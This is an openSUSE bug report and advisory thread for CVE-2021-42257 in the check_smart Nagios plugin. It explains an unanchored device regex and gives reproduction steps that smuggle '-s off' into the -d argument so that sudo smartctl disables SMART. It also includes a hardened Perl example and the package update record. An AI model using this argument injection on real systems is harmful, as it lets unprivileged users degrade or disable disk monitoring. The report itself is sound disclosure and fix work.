Bug 1183057 (CVE-2021-42257) - VUL-0: CVE-2021-42257: monitoring-plugins-smart: unprivileged user can modify SMART settings due to insufficient input validation in check_smart.pl
Summary: VUL-0: CVE-2021-42257: monitoring-plugins-smart: unprivileged user can modify...
Status: RESOLVED FIXED
Alias: CVE-2021-42257
Product: openSUSE Distribution
Classification: openSUSE
Component: Security
Version: Leap 15.1
Hardware: Other Other
Priority: P2 - High, Severity: Normal
Target Milestone: ---
Assignee: Lars Vogdt
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/279235/
Whiteboard:
Keywords:
Depends on:
Blocks: 1176157 1180880
 
Reported: 2021-03-04 20:37 UTC by Wolfgang Frisch
Modified: 2021-10-14 19:31 UTC (History)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Description Wolfgang Frisch 2021-03-04 20:37:50 UTC
+++ This bug was initially created as a clone of Bug #1180880 +++

The script `check_smart.pl` in monitoring-plugins-smart [0] is supposed to gather read-only information about hard drives by calling `smartctl` [1]. The latter requires root privileges, so the package grants passwordless access to the nagios user via `/etc/sudoers.d/monitoring-plugins-smart`.

Example intended usage:
/usr/lib/nagios/plugins/check_smart -i auto -d /dev/sda
>OK: Drive  ST2000LM007-1R8174 S/N WDZJESC2: no SMART errors detected.

An oversight in the script's input validation of the device (-d) parameter allows the unprivileged `nagios` user to modify SMART settings, disable SMART monitoring entirely, shut down the drive or degrade the drive's performance by disabling its read cache.

The -d parameter is validated as follows:
```
# Unanchored regex: /dev/bus/N is accepted anywhere inside the string,
# so a path such as /tmp/dev/bus/1/sda (with trailing text) passes.
if (-b $opt_dl || -c $opt_dl || $opt_dl =~ m/\/dev\/bus\/\d/) {
	$device .= $opt_dl.":";

} else {
	warn "$opt_dl is not a valid block/character special device!\n\n" if $opt_debug;
}
```

So an acceptable device name would be a block special device, a char special device or match the regex `/dev/bus/\d`.
Critically, this regex matches even when /dev/bus/\d is just a _substring_ of any arbitrary directory, for example `/tmp/dev/bus/1/sda`.

Later, this parameter is used to spawn a subprocess:
```
# Single-string command run through backticks: the shell parses it, so
# whitespace inside $device becomes additional smartctl arguments.
my $full_command = "$smart_command -d $interface -Hi $device";
my @output = `$full_command`;
```

This can be exploited to pass arbitrary parameters to smartctl, some of which affect the drive's behavior negatively.

Steps to reproduce:
-------------------

# simulate nagios user
su -l -s /bin/bash nagios
mkdir -p /tmp/dev/bus/1/
ln -s /dev/sda /tmp/dev/bus/1/
ls -l /tmp/dev/bus/1/sda

>lrwxrwxrwx 1 nagios nagios 8 Mar  4 21:27 /tmp/dev/bus/1/sda -> /dev/sda

/usr/lib/nagios/plugins/check_smart --debug -i auto -d "/tmp/dev/bus/1/sda -s off"

>(debug) executing:
>sudo smartctl -d auto -Hi /tmp/dev/bus/1/sda -s off
>SMART Disabled.

Remediation:
------------
- Improve the validation regex, e.g. ^/dev/bus/\d$
- Prevent shell command injection, e.g. by passing a list to the system function.

[0] https://github.com/Napsty/check_smart/
[1] https://www.smartmontools.org/
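The two remediation points above, an anchored device check and running smartctl without a shell, as an added Perl example. This is not code from check_smart.pl nor the fix shipped in 6.9.1; the function names `device_ok_old`, `device_ok_new`, `build_argv` and `run_smartctl` are chosen here, the hardened regex uses `\d+` instead of the single-digit `\d` suggested in the report, and `sudo smartctl` is assumed to be the wrapped command, as in the debug output shown in the reproduction steps.

```perl
#!/usr/bin/perl
# Added example, not part of check_smart.pl: contrasts the original
# substring match with an anchored check, and builds the smartctl call
# as an argument list so that the -d value can never grow extra flags.
use strict;
use warnings;

# Original behaviour (simplified): unanchored regex, so
# "/tmp/dev/bus/1/sda -s off" is accepted.
sub device_ok_old {
    my ($dev) = @_;
    my $ok = (-b $dev || -c $dev || $dev =~ m{/dev/bus/\d});
    return $ok ? 1 : 0;
}

# Hardened check: no whitespace, no leading dash (would be parsed as an
# option), and either a real block/char special device or an exact
# /dev/bus/N path (\d+ chosen here; the report suggests \d).
sub device_ok_new {
    my ($dev) = @_;
    return 0 unless defined $dev && length $dev;
    return 0 if $dev =~ /\s/ || $dev =~ /^-/;
    return 1 if -b $dev || -c $dev;
    return 1 if $dev =~ m{^/dev/bus/\d+$};
    return 0;
}

# Argument list, never a single shell string. Returned rather than run so
# it can be inspected in a dry run. Assumes sudo + smartctl as wrapped here.
sub build_argv {
    my ($interface, $device) = @_;
    die "invalid device: $device\n" unless device_ok_new($device);
    return ('sudo', 'smartctl', '-d', $interface, '-Hi', $device);
}

# Capture smartctl output through the list form of a pipe open: with more
# than one list element Perl execs directly and no shell is involved, so a
# device string containing "-s off" would reach smartctl as one (invalid)
# argument instead of two extra flags.
sub run_smartctl {
    my @argv = build_argv(@_);
    open(my $fh, '-|', @argv) or die "cannot run $argv[0]: $!\n";
    my @output = <$fh>;
    close($fh);
    return @output;
}

if (!caller) {
    # Dry run: show how both checks treat the payload from the report.
    for my $d ('/dev/bus/0', '/tmp/dev/bus/1/sda -s off', '/dev/sda') {
        printf "%-30s old=%d new=%d\n", $d, device_ok_old($d), device_ok_new($d);
    }
    my @argv = build_argv('auto', '/dev/bus/0');
    print "argv: @argv\n";
    eval { build_argv('auto', '/tmp/dev/bus/1/sda -s off'); 1 }
        or print "rejected: $@";
}
```

Run with `perl` as any user; the dry run needs no smartctl, only `run_smartctl` does. One caveat the report does not settle: if `/etc/sudoers.d/monitoring-plugins-smart` allows nagios to run `smartctl` with arbitrary arguments, the plugin's input validation protects only against callers who can control `-d` without already having a shell as nagios; in that case the sudoers rule itself needs tightening to the exact invocation as a complementary fix.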
Comment 7 Lars Vogdt 2021-05-10 11:20:23 UTC
Upgraded package submitted in server:monitoring.

SR to openSUSE:Factory               -> 892019
openSUSE:Backports:SLE-15-SP1:Update -> 892015
openSUSE:Backports:SLE-15-SP2:Update -> 892016
openSUSE:Backports:SLE-15-SP3        -> 892017
openSUSE:Leap:15.2:Update            -> 892018

All upgraded to the version in server:monitoring. 
Suggestion for the Patchinfo:

This upgrade to version 6.9.1 mainly fixes a security issue, which allows an attacker to modify SMART settings due to insufficient input validation in check_smart (bsc#1183057).

In addition, the following new features are integrated:
+ Allows using PCI device paths as device name(s) (#64)
+ Introduce new optional parameter (-l/--ssd-lifetime) which additionally
  checks SMART attribute "Percent_Lifetime_Remain"
  (available on some SSD drives). (#66 #67)
+ Allow skip self-assessment check (--skip-self-assessment)
+ Add Command_Timeout to default raw list
+ Added support for NVMe drives
+ The feature was requested in #30. This PR adds the possibility to
  use 3ware,N and cciss,N drives in combination with the 
  global -g parameter.
+ Furthermore this PR adjusts the output of the plugin when the -g 
  is used in combination with hardware raid controllers. Instead of
  showing the logical device name (/dev/sda for example), the plugin
  will now show the controller with drive number
+ Add Reported_Uncorrect and Reallocated_Event_Count to default raw list.
Comment 8 OBSbugzilla Bot 2021-05-10 12:20:03 UTC
This is an autogenerated message for OBS integration:
This bug (1183057) was mentioned in
https://build.opensuse.org/request/show/892023 Factory / monitoring-plugins-smart
https://build.opensuse.org/request/show/892024 Backports:SLE-15-SP1 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892025 Backports:SLE-15-SP2 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892026 Backports:SLE-15-SP3 / monitoring-plugins-smart
https://build.opensuse.org/request/show/892027 15.2 / monitoring-plugins-smart
Comment 9 Swamp Workflow Management 2021-05-10 22:18:05 UTC
openSUSE-SU-2021:0706-1: An update that contains security fixes can now be installed.

Category: security (important)
Bug References: 1183057
CVE References: 
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    monitoring-plugins-smart-6.9.1-lp152.4.3.1
openSUSE Backports SLE-15-SP2 (src):    monitoring-plugins-smart-6.9.1-bp152.4.3.1
openSUSE Backports SLE-15-SP1 (src):    monitoring-plugins-smart-6.9.1-bp151.4.3.1
Comment 10 Wolfgang Frisch 2021-10-14 16:30:23 UTC
CVE-2021-42257 was assigned to this issue.